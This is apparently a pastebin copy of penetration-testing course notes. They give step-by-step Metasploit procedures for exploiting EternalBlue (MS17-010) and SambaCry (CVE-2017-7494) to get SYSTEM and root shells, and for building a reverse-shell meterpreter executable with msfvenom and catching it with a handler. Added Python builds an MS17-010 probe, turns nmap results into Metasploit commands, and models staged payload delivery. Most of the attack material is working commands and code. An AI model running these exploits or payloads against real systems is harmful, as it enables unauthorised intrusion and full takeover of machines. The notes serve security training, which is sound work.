viprajput

G2s8

Jul 16th, 2018
Grade 2 Session 8
=================
Console Based Exploitation 3
Windows 7 --> Eternal Blue
Samba Cry --> Eternal Red
Application Based Exploitation
Payload Based Exploitation
Post Exploitation --> Local Privilege Escalation
GUI Based Exploitation --> Armitage

Console Based Exploitation 3
----------------------------
Eternal Blue --> NSA exploit leaked by the Shadow Brokers in April 2017; exploits a bug in SMBv1 (patched by MS17-010)
EternalBlue + DoublePulsar
dll --> Dynamic Link Library file
EternalBlue is the SMBv1 exploit: it gives kernel-mode code execution on the target. DoublePulsar is the backdoor (implant) that EternalBlue installs; the attacker then uses DoublePulsar to inject a malicious .dll into a process on the target.
Shadow Brokers leak ---> Fuzzbunch (started with fb.py) --> the NSA's exploitation framework, roughly its equivalent of Metasploit
Empire --> a separate open-source PowerShell post-exploitation framework, not part of the NSA leak
Metasploit module --> exploit/windows/smb/ms17_010_eternalblue (the exploit ported into MSF, so Fuzzbunch is not needed)
Steps
=====
Open a terminal (shell commands are shown with #, msfconsole commands with msf >)
1. #arp-scan --local
Target IP Address --> 192.168.228.138
2. #nmap 192.168.228.138
3. #nmap -sS -sC -sV 192.168.228.138
4. #nmap 192.168.228.138 --script vuln
smb-vuln-ms17-010 reports the host VULNERABLE, id CVE-2017-0143 (MS17-010 fixes CVE-2017-0143 through CVE-2017-0148; the EternalBlue bug itself is CVE-2017-0144)
Open another terminal, start metasploit framework
5. #msfconsole
6. msf > search CVE-2017-0143   (search ms17_010 also finds the modules)
7. msf > use auxiliary/scanner/smb/smb_ms17_010
8. msf > options   (alias of show options)
9. msf > set rhosts 192.168.228.138
10. msf > options
11. msf > run
"Host is likely VULNERABLE to MS17-010!" --> host is vulnerable to the exploit
12. msf > use exploit/windows/smb/ms17_010_eternalblue
13. msf > show options
14. msf > set rhost 192.168.228.138
15. msf > options
16. msf > exploit
C:\Windows\system32> --> I got access to the command prompt (with a shell payload); it runs as NT AUTHORITY\SYSTEM because the exploit executes in the kernel
For changing the payload: the module's targets are 64-bit Windows 7 / Server 2008 R2, so use the x64 payload (a 32-bit windows/meterpreter/reverse_tcp will not run on an x64 target) and set lhost to the attacker's IP
set payload windows/x64/meterpreter/reverse_tcp
set lhost <attacker IP>
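What the smb_ms17_010 scanner does on the wire, as an added example written for these notes (Python; not Metasploit's or nmap's code): the public MS17-010 checks send a TRANS2 request with the undocumented SESSION_SETUP subcommand (0x000E) to the IPC$ tree and classify the NT status in the reply: STATUS_INSUFF_SERVER_RESOURCES means unpatched, STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED means patched. The packet layout is my reconstruction from MS-CIFS; the SMB1 negotiate, anonymous session setup and tree connect to IPC$ that must come first (they produce the tid and uid) are not included, and the sample replies are constructed, not captured.

```python
import struct

SMB_COM_TRANSACTION2 = 0x32
TRANS2_SESSION_SETUP = 0x000E                 # undocumented subcommand used by the MS17-010 probes
STATUS_SUCCESS = 0x00000000
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched host answers with this
STATUS_INVALID_HANDLE = 0xC0000008            # patched
STATUS_ACCESS_DENIED = 0xC0000022             # patched

# magic, command, NT status, flags, flags2, PIDHigh, signature, reserved, TID, PID, UID, MID (32 bytes)
SMB1_HEADER = '<4sBIBHH8sHHHHH'

def smb1_header(command, tid, uid, status=STATUS_SUCCESS, flags=0x18, flags2=0xC001, pid=0x1234, mid=1):
    """SMB1 header; flags2 0xC001 = Unicode + NT status codes + long names."""
    return struct.pack(SMB1_HEADER, b'\xffSMB', command, status, flags, flags2,
                       0, b'\x00' * 8, 0, tid, pid, uid, mid)

def netbios_frame(smb):
    """NetBIOS session service framing: type byte 0x00 + 3-byte big-endian length."""
    return b'\x00' + len(smb).to_bytes(3, 'big') + smb

def build_trans2_session_setup_probe(tid, uid):
    """TRANS2 request, SetupCount=1, Setup[0]=0x000E, 12 zero parameter bytes (reconstruction)."""
    params = b'\x00' * 12
    # ParameterOffset is counted from the start of the SMB header:
    # 32 header + 1 WordCount + 30 words + 2 ByteCount = 65, padded to a 4-byte boundary = 68
    param_offset = 68
    pad = b'\x00' * (param_offset - 65)
    words = struct.pack('<HHHHBBHIHHHHHBB',
                        len(params), 0,              # TotalParameterCount, TotalDataCount
                        2, 0,                        # MaxParameterCount, MaxDataCount
                        0, 0,                        # MaxSetupCount, Reserved
                        0, 0,                        # Flags, Timeout
                        0,                           # Reserved2
                        len(params), param_offset,   # ParameterCount, ParameterOffset
                        0, 0,                        # DataCount, DataOffset
                        1, 0)                        # SetupCount, Reserved3
    words += struct.pack('<H', TRANS2_SESSION_SETUP)  # Setup[0]
    body = bytes([len(words) // 2]) + words + struct.pack('<H', len(pad) + len(params)) + pad + params
    return netbios_frame(smb1_header(SMB_COM_TRANSACTION2, tid, uid) + body)

def parse_smb1_response(frame):
    """Return (command, nt_status) from a NetBIOS-framed SMB1 reply; reject truncated or non-SMB1 data."""
    if len(frame) < 4 + 32 or frame[0] != 0x00:
        raise ValueError('not a NetBIOS session message')
    length = int.from_bytes(frame[1:4], 'big')
    if length < 32 or len(frame) < 4 + length:
        raise ValueError('truncated SMB message')
    fields = struct.unpack_from(SMB1_HEADER, frame, 4)
    if fields[0] != b'\xffSMB':
        raise ValueError('bad SMB magic (SMB2/3 replies start with 0xFE)')
    return fields[1], fields[2]

def classify_ms17_010(frame):
    """Turn the status of the TRANS2 reply into the scanner's verdict."""
    command, status = parse_smb1_response(frame)
    if command != SMB_COM_TRANSACTION2:
        return 'unexpected reply (command 0x%02x)' % command
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return 'likely VULNERABLE to MS17-010'
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return 'patched'
    return 'inconclusive (status 0x%08x)' % status

def recv_exact(sock, n):
    """recv() can return short reads; collect exactly n bytes."""
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('connection closed mid-reply')
        buf += chunk
    return buf

def probe_over_socket(sock, tid, uid):
    """Send the probe on an SMB1 connection that is already past negotiate/session setup/tree connect."""
    sock.sendall(build_trans2_session_setup_probe(tid, uid))
    nb = recv_exact(sock, 4)
    return classify_ms17_010(nb + recv_exact(sock, int.from_bytes(nb[1:4], 'big')))

def sample_reply(status):
    """Constructed error reply: flags 0x98 (reply bit set), WordCount 0, ByteCount 0."""
    return netbios_frame(smb1_header(SMB_COM_TRANSACTION2, 0x0800, 0x0800, status=status, flags=0x98)
                         + b'\x00' + b'\x00\x00')

if __name__ == '__main__':
    print('unpatched reply ->', classify_ms17_010(sample_reply(STATUS_INSUFF_SERVER_RESOURCES)))
    print('patched reply   ->', classify_ms17_010(sample_reply(STATUS_ACCESS_DENIED)))
```

Against a live host, do the SMB1 handshake with any SMB1 client library, then hand the socket and the tid/uid to probe_over_socket; the offline functions show how the scanner reaches its verdict from the reply.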

Samba Cry - Eternal Red
=======================
CVE-2017-7494 in Samba, the SMB server used on Linux/Unix. Affects Samba 3.5.0 onwards (fixed in 4.6.4, 4.5.10 and 4.4.14, May 2017). It is a Samba bug, not a flaw in the SMBv2 protocol, and it was not part of the NSA/Shadow Brokers leak; "EternalRed" is a nickname it got because it appeared about a month after EternalBlue.
How it works: an attacker who can write to a share uploads a shared library (.so) and then opens a named pipe whose name is that library's path on the server, which makes smbd load and run the library. Preconditions: a writable share, and the server-side path of that share (the Metasploit module tries to find both).
Open a terminal
1. #arp-scan --local
Target IP Address --> 192.168.228.151
2. #nmap 192.168.228.151
3. #nmap -sS -sC -sV 192.168.228.151
4. #nmap 192.168.228.151 --script vuln
Open another terminal, start metasploit framework
5. msf > search is_known_pipename
6. msf > search cve-2017-7494
exploit/linux/samba/is_known_pipename
7. msf > use exploit/linux/samba/is_known_pipename
8. msf > info
9. msf > options
10. msf > set rhost 192.168.228.151
11. msf > run
Will give me a raw shell --> plain command shell (not meterpreter), running as root because smbd runs as root
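The nmap --script vuln step appears in both procedures above (EternalBlue and SambaCry), and the next step is always picking the matching Metasploit module by hand. As an added example (my Python, not part of the session notes and not nmap or Metasploit code), this parses nmap's XML output (nmap -oX scan.xml ...), pulls every vulnerability table with its state, and emits msfconsole commands that run each matching module's check against the flagged hosts. The XML is constructed after the layout of nmap's vulns library (a <table> per vulnerability id containing an <elem key="state">), and the CVE-to-module map covers only the two modules from this session.

```python
import xml.etree.ElementTree as ET

# Vulnerability ids reported by nmap's vuln scripts -> Metasploit module (the two from this session)
MSF_MODULES = {
    'CVE-2017-0143': 'exploit/windows/smb/ms17_010_eternalblue',   # MS17-010 / EternalBlue
    'CVE-2017-7494': 'exploit/linux/samba/is_known_pipename',      # SambaCry / EternalRed
}

# Constructed sample of `nmap -oX` output (not a real capture), three hosts: two flagged, one clean
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.168.228.138" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
        </table>
      </script>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="192.168.228.151" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-cve-2017-7494" output="LIKELY VULNERABLE">
        <table key="CVE-2017-7494"><elem key="state">LIKELY VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="192.168.228.1" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
</nmaprun>"""

def parse_vuln_findings(xml_text):
    """Return [(host ip, script id, vulnerability id, state)] for every vulns-library table in the scan."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter('host'):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get('addr') if addr is not None else '?'
        for script in host.iter('script'):
            for table in script.findall('table'):        # one table per vulnerability id
                state = table.find("elem[@key='state']")  # nested tables (ids, refs) have no state elem
                if state is not None:
                    findings.append((ip, script.get('id'), table.get('key'), state.text))
    return findings

def is_flagged(state):
    """nmap states: VULNERABLE, LIKELY VULNERABLE, VULNERABLE (Exploitable), NOT VULNERABLE, UNKNOWN."""
    return 'VULNERABLE' in state and not state.startswith('NOT')

def plan_checks(findings, lhost):
    """msfconsole commands that run each matching module's `check` (not `exploit`) on the flagged hosts."""
    lines = []
    for ip, _script_id, vuln_id, state in findings:
        module = MSF_MODULES.get(vuln_id)
        if module is None or not is_flagged(state):
            continue
        lines += ['use %s' % module, 'set RHOSTS %s' % ip, 'set LHOST %s' % lhost, 'check']
    return lines

def to_resource_script(commands):
    """Text for a .rc file: run it with `msfconsole -q -r checks.rc`."""
    return '\n'.join(commands) + '\n'

if __name__ == '__main__':
    print(to_resource_script(plan_checks(parse_vuln_findings(SAMPLE_XML), '192.168.228.129')))
```

Save the output as checks.rc and run msfconsole -q -r checks.rc; switch `check` to `exploit` only once the check confirms the host and a payload/LHOST are set deliberately.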

Application Based Exploitation
==============================
Open the terminal, start with msfconsole
1. #msfconsole
2. msf > search payload/windows/meterpreter
payload/windows/meterpreter/reverse_tcp --> staged: the exe only holds a small stager, the handler sends the meterpreter stage after connect-back (the one used below)
payload/windows/meterpreter_reverse_tcp --> stageless: the whole meterpreter is inside the exe (bigger file, no stage download)
payload/windows/meterpreter/reverse_http --> staged, connect-back over HTTP

Open another terminal, for creating a payload - stub (the executable that will run on the victim)
3. #msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe

-p --> selecting the payload
windows/meterpreter/reverse_tcp --> is the payload
lhost --> attacker's IP address (must be reachable from the victim)
lport --> attacker's listening port
-f --> file format
exe --> executable file
> --> destination of the output (-o /root/Desktop/prasheel.exe does the same)
/root/Desktop/prasheel.exe --> is the output file

Go back to the first terminal, set up the listening server (handler); payload, lhost and lport must match what was given to msfvenom
4. msf > use exploit/multi/handler
5. msf > show options
6. msf > set payload windows/meterpreter/reverse_tcp
7. msf > show options
8. msf > set lport 8989
9. msf > set lhost 192.168.0.25
10. msf > exploit   (exploit -j keeps the handler running as a background job)
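Why the handler's payload, lhost and lport must match the msfvenom options: windows/meterpreter/reverse_tcp is staged, so the exe only contains a stager that connects back to LHOST:LPORT, reads a 4-byte little-endian length and then that many bytes of stage from the handler, and executes them. The Python below, added for these notes (it is not Metasploit's code), models that exchange with both sides on localhost: the stage bytes are a constructed stand-in for the real meterpreter stage, and the stager only returns the bytes instead of executing them.

```python
import socket
import struct
import threading

# Constructed stand-in for the stage (for windows/meterpreter/reverse_tcp it is the metsrv DLL).
STAGE = bytes(range(256)) * 16   # 4096 bytes, enough to need more than one recv()

def recv_exact(sock, n):
    """recv() may return short reads; loop until exactly n bytes arrive or the peer closes."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('peer closed after %d of %d bytes' % (len(buf), n))
        buf += chunk
    return bytes(buf)

def handler_serve_stage(listener, stage):
    """exploit/multi/handler side: accept one connection, send <u32 LE length><stage>, close."""
    conn, _peer = listener.accept()
    with conn:
        conn.sendall(struct.pack('<I', len(stage)) + stage)

def start_handler(stage, lhost='127.0.0.1', lport=0):
    """Bind LHOST:LPORT (port 0 = let the OS pick) and serve one stage from a background thread."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((lhost, lport))
    listener.listen(1)
    worker = threading.Thread(target=handler_serve_stage, args=(listener, stage), daemon=True)
    worker.start()
    return listener, worker

def stager_connect_back(lhost, lport, max_stage=16 * 1024 * 1024):
    """What the stager in the msfvenom exe does: connect, read the length, read the stage."""
    with socket.create_connection((lhost, lport), timeout=5) as s:
        (length,) = struct.unpack('<I', recv_exact(s, 4))
        # the real stager allocates `length` bytes of RWX memory here and jumps into them
        if length == 0 or length > max_stage:
            raise ValueError('implausible stage length %d' % length)
        return recv_exact(s, length)

def run_demo(stage=STAGE):
    """Start the handler, run the stager against it, return True if the stage arrived intact."""
    listener, worker = start_handler(stage)
    try:
        lport = listener.getsockname()[1]
        received = stager_connect_back('127.0.0.1', lport)
    finally:
        worker.join(5)
        listener.close()
    return received == stage

if __name__ == '__main__':
    print('stage delivered intact:', run_demo())
```

If the handler were set to a different payload, for example the stageless windows/meterpreter_reverse_tcp, it would not send a length-prefixed stage and the stager would sit forever in recv_exact(s, 4); a connection that appears in the handler and then never becomes a session is the usual symptom of a payload or port mismatch between msfvenom and multi/handler.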

Armitage --> GUI Based Exploitation
Graphical front end for the Metasploit Framework: the same modules, scanning, exploitation and sessions, driven from a GUI instead of msfconsole